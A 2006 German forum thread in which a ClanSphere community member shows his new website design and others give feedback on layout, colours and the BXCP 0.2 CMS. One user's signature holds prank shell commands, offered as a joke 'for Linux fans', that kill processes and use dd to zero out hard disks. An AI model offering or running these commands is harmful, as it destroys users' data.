Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 16
Seite [1]
Brösel


Rock the board





Beiträge: 42
# Thema - 09.12.2006 um 20:58 Uhr
Hallo Communitym

ich bin wieder zurück mit meinem größten Projekt bisher. Es ist auch noch nicht ganz Fertig einige Bereiche fehlen noch. Aber hier ist Sie:

http://www.broesel-design.de


Viel Spass


mfg Brösel


------------------
WS | Brösel
Designer Webmedia Solutions [ www.webmedia-solutions.de ]

Zuletzt editiert von Brösel am 09.12.2006 um 21:01 Uhr (1x Editiert)
Inaktiv
Julinator


Rock the board



Herkunft: Pfaffenhofen
Beiträge: 57
# Antwort: 1 - 09.12.2006 um 20:59 Uhr
Schicke Seite. Gefällt mir, weiter so!


Inaktiv
|
racor


Going for pro




Beiträge: 476
# Antwort: 2 - 09.12.2006 um 22:02 Uhr


Du hast da ein TippFehler


------------------

ONLINE PORTFOLIO

Inaktiv
|
~* PwNaTiOn *~


Beginner



Herkunft: Bingen am Rhein
Beiträge: 14
# Antwort: 3 - 09.12.2006 um 22:34 Uhr
lol racor xD und deshalb schreibste jetz extra en comment oda wuz?^^ schreib wenigstens deine meinung dazu... also ich finds auch echt gelungen deine arbeit wird immer besser!


------------------
mfg Sven
------------------

Inaktiv
|
Brösel
Thread-Ersteller


Rock the board





Beiträge: 42
# Antwort: 4 - 09.12.2006 um 22:40 Uhr
danke schön

und danke für den bug hinweis is gefixt


------------------
WS | Brösel
Designer Webmedia Solutions [ www.webmedia-solutions.de ]

Zuletzt editiert von Brösel am 09.12.2006 um 22:40 Uhr (1x Editiert)
Inaktiv
|
maikoldi


Going for pro




Herkunft: Ottersberg
Beiträge: 545
# Antwort: 5 - 09.12.2006 um 22:47 Uhr
welches cms benutzte?also ich finde deine seiten sehen imemr zu sehr nach sebel design aus


------------------
Visit:http://www.roundowner.de
Puplicons +-



Inaktiv
|
Brösel
Thread-Ersteller


Rock the board





Beiträge: 42
# Antwort: 6 - 09.12.2006 um 22:54 Uhr
lol hm ich hab bei sebel-design mein designen angefangen das kann vieleicht daran liegen und ich hab dafür BXCP 0.2 benutzt


------------------
WS | Brösel
Designer Webmedia Solutions [ www.webmedia-solutions.de ]

Inaktiv
|
sgraewe ClanSphere Team

Supporter
Supporter




Beiträge: 6116
# Antwort: 7 - 09.12.2006 um 22:54 Uhr
finds sehr gut gelungen kannte das design ja schon aus dem internen sind zwar nen paar valid fehler aber sonst sehr gut ^^

PS. er nutzt bxcp 0.2


Inaktiv
|
Brösel
Thread-Ersteller


Rock the board





Beiträge: 42
# Antwort: 8 - 09.12.2006 um 22:55 Uhr
hehe ein tick zu langsam equal


------------------
WS | Brösel
Designer Webmedia Solutions [ www.webmedia-solutions.de ]

Inaktiv
|
sgraewe ClanSphere Team

Supporter
Supporter




Beiträge: 6116
# Antwort: 9 - 09.12.2006 um 23:01 Uhr
jo wie immer xD


Inaktiv
|
racor


Going for pro




Beiträge: 476
# Antwort: 10 - 09.12.2006 um 23:22 Uhr
@ ~* PwNaTiOn *~: Ich hab Brösel meine Meinung schon vor 1 Woche gesagt und ich hatte ihm auch den Fehler per ICQ mitteilen wollen, er war jedoch nicht online. Aber zu deiner Befriedigung :

ZUM DESIGN:

Schön übersichtlich, hat Style.


------------------

ONLINE PORTFOLIO

Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 11 - 10.12.2006 um 03:20 Uhr
Mhmm es guibt doch noch leute die dem guten alten 0.2 einfach nicht frmend gehen können xD.

Zum Design an sich. Es fehlt das gewisse Estwas. Ich finde es fast schon zu schlicht und dunkel..

Aber etwas Farbe kommt ja oben links bei den 3 Naviblöcken mit ins Spiel (nich böse gemeint)

Also mein Fall isses persönlich ned so.


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
logaan


King for a day




Herkunft: Gütersloh
Beiträge: 209
# Antwort: 12 - 10.12.2006 um 11:29 Uhr
schließe nich pHaeno*s Meinung an. Aber wenn ich mal so in die Referenzen blicke und auch deine vorigen Sites sehe: du bist auf dem richtigen weg


------------------
portfolio.
Clanpage Video Tutorial

TemplateDesigner 1.02
Templates anpassen war noch nie so einfach...

Inaktiv
|
!nvis!ble Dragon


Rock the board





Beiträge: 50
# Antwort: 13 - 10.12.2006 um 12:16 Uhr
hmm finde es eigentlich gut gelungen ....

Zum Design ist nen bissle tonlos sag ich mal ... die farben sind da nur wenn die farben da sind sind sie eher verwaschen statt kräftig ... hmm joa ansonsten finde ich nur noch den buitten in der navi Gaming .... das ende dieses schräge nach unten fallen das hätte ich an deiner stelle nen bissle verändert das sieht n bissle komisch aus .... ^^ machs rund oder so xD

7/10 P mach nen bissel mehr farbe rein und änder das gaming ding und scho kriegste von mir 9 P ^^ xD


------------------
WS | Shruikan
Designer Webmedia Solutions [ www.webmedia-solutions.de ]

Inaktiv
|
Brösel
Thread-Ersteller


Rock the board





Beiträge: 42
# Antwort: 14 - 10.12.2006 um 12:57 Uhr
hehe danke schön

ja ich werd erstmal das fehlende fertig coden und die sachen was ich noch vorhab machen und dann kann ich mich nochmal ums design kümmern


------------------
WS | Brösel
Designer Webmedia Solutions [ www.webmedia-solutions.de ]

Inaktiv
|
duRiel ClanSphere Team


Weltmeister




Herkunft: Cambridge
Beiträge: 7300
# Antwort: 15 - 18.12.2006 um 19:33 Uhr
lol, gibt tatsächlich noch so verfressene bxcp 02 user

mit den subtemplates wirst du aber endlich umsteigen oder?

zum design: nicht schlecht, navi mag ich aber nicht. oben bilder + auffallende rollover effekte, subnavi einfache textlinks
roter "design" head gefällt mir gut.


Inaktiv
|
Frostfire


Rock the board




Beiträge: 98
# Antwort: 16 - 18.12.2006 um 20:13 Uhr
jo ich finde die seite auch gut.


Inaktiv
|
Antworten: 16
Seite [1]


Sie müssen sich registrieren, um zu antworten.